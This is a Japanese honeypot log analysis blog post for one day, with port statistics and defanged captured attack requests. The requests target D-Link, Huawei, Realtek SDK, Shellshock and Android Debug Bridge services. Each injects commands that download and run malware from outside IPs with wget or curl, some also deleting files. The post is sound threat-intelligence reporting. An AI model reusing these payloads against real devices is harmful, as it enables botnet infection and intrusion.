ハニーポット簡易分析(16日目:8/23)
Apache Struts2 の脆弱性(CVE-2018-11776)(S2-057)が話題になっていますが、 23日時点ではまだ攻撃は観測できていませんでした。
早く観測できないかなーと思いつつ、8月23日分の分析を行います。
8/23 Honeytrap 分析
検知数 5583件 (データ有 3043件)
宛先ポート | サービス | 検知数 | 割合 | 攻撃概要 |
445 | SMB | 1,627 | 53.47% | 調査行為 |
22 | SSH | 90 | 2.96% | 調査行為 |
1433 | Microsoft SQL Server | 67 | 2.20% | 調査行為 |
3389 | RDP | 54 | 1.77% | 調査行為 |
8088 | Asterisk (PBX) Web Configuration utility | 41 | 1.35% | /conf へのアクセス |
52869 | D-Link, Realtek SDK | 40 | 1.31% | マルウェアダウンロード |
81 | ? | 40 | 1.31% | 調査行為 |
993 | IMAPS | 38 | 1.25% | 調査行為 |
8000 | ? | 36 | 1.18% | 調査行為 |
2375 | Docker | 34 | 1.12% | 調査行為 |
マルウェアダウンロード:
ポート:8081
①D-Link 社のルータへの攻撃CVE-2015-2051)
→
POST /HNAP1/ HTTP/1[.]0
SOAPAction: hxxp;//purenetworks[.]com/HNAP1/`cd /tmp && rm -rf * && wget hxxp;//176[.]32[.]32[.]156/bin && sh /tmp/bin`
ポート:37215
①Huawei社のルータを狙った攻撃
POST /ctrlt/DeviceUpgrade_1 HTTP/1[.]1
wget -g 209[.]141[.]33[.]86
ポート:52869
①Realtek SDK の miniigd SOAP の脆弱性を狙った攻撃
→ Mirai系マルウェア
POST /picsdesc[.]xml HTTP/1[.]1
・wget hxxp;//212[.]237[.]32[.]62/mips
・wget hxxp;//159[.]65[.]232[.]56/xd[.]mips
・wget hxxp;//167[.]99[.]14[.]199/bogan[.]mips
・wget hxxp;//107[.]191[.]99[.]41/elf[.]mips
・wget hxxp;//142[.]93[.]1[.]75/hoho[.]mips
ポート:8080
① Shell Shock の脆弱性を狙った攻撃
GET /cgi-bin/authLogin[.]cgi HTTP/1[.]1
User-Agent: () { :; }; /bin/rm -rf /tmp/S0[.]sh && /bin/mkdir -p /share/HDB_DATA/[.][.][.]/php && /usr/bin/wget -c hxxp;//185[.]14[.]30[.]79/S0[.]sh -P /tmp && /bin/sh /tmp/S0[.]sh 0<&1 2>&1
②D-Linkのルータの脆弱性を狙った攻撃
GET /login[.]cgi?cli=aa%20aa%27;wget%20hxxp;//209[.]141[.]33[.]86/d%20-O%20-%3E%20/tmp/[.]shinka;sh%20/tmp/[.]shinka%27$ HTTP/1[.]1
ポート 5555
①Android Debug Bridge に対する攻撃
CNXN ¼±§±host:: OPEN Ý °¯º±shell:cd /data/local/tmp;wget hxxp;//207[.]148[.]78[.]152/br -O- >br;sh br;busybox wget hxxp;//207[.]148[.]78[.]152/r -O- >r;sh r;curl hxxp;//207[.]148[.]78[.]152/c >c;sh c;busybox curl hxxp;//207[.]148[.]78[.]152/bc >bc;sh bc;rm -rf bc br r c;[.]
CNXN ¼±§±host:: OPEN Ý °¯º°¯º±shell:>/sdcard/Download/f && cd /sdcard/Download/; >/dev/f && cd /dev/; >/data/local/tmp/f && cd /data/local/tmp/; busybox wget hxxp;//185[.]162[.]130[.]187/adbs -O -> adbs; sh adbs; curl hxxp;//185[.]162[.]130[.]187/adbs2 > adbs2; sh adbs2; rm adbs adbs2[.]
CNXN ¼±§±host:: OPEN Ý °¯º°¯º±shell:cd /data/local/tmp/; busybox wget hxxp;//27[.]102[.]115[.]44/adbs -O -> adbs; sh adbs; curl hxxp;//27[.]102[.]115[.]44/adbs2 > adbs2; sh adbs2; rm adbs; rm adbs2[.]
今回の分析は以上となります。